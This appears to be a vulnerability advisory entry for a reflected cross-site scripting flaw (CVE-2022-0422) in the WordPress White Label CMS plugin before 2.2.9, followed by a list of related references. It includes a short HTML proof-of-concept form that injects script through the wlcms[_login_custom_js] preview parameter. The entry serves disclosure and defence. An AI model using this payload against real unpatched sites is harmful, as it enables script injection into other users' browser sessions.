Lucene search
Krzysztof ZającWPEX-ID:429BE4EB-8A6B-4531-9465-9EF0D35C12CCHistoryFeb 07, 2022 - 12:00 a.m.
White Label MS < 2.2.9 - Reflected Cross-Site Scripting
2022-02-0700:00:00
Krzysztof Zając
190
white label ms
cross-site scripting
vulnerability
unauthenticated
authenticated
EPSS
0.001
Percentile
41.5%
The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue
In v < 2.2.8, both unauthenticated and authenticated users can be attacked with it. In 2.2.8, it will only trigger against authenticated user
<html>
<body>
<form action="https://example.com/wp-login.php?wlcms-action=preview" method="POST">
<input type="text" value='alert(/XSS/);' name="wlcms[_login_custom_js]" />
<input type="submit" value="Exploit me pls" />
</form>
</body>
</html>Related
cve
cve
CVE-2022-0422
2022-03-07 09:15:09
wpvulndb
wpvulndb
White Label MS < 2.2.9 - Reflected Cross-Site Scripting
2022-02-07 00:00:00
nvd
nvd
CVE-2022-0422
2022-03-07 09:15:09
cnvd
cnvd
WordPress White Label CMS Plugin Cross-Site Scripting Vulnerability
2022-03-09 00:00:00
prion
prion
Cross site scripting
2022-03-07 09:15:00
openvas
openvas
WordPress White Label CMS Plugin < 2.2.9 XSS Vulnerability
2022-03-22 00:00:00
nuclei
nuclei
WordPress White Label CMS <2.2.9 - Cross-Site Scripting
2022-04-29 06:39:46
cvelist
cvelist
CVE-2022-0422 White Label MS < 2.2.9 - Reflected Cross-Site Scripting
2022-03-07 08:16:34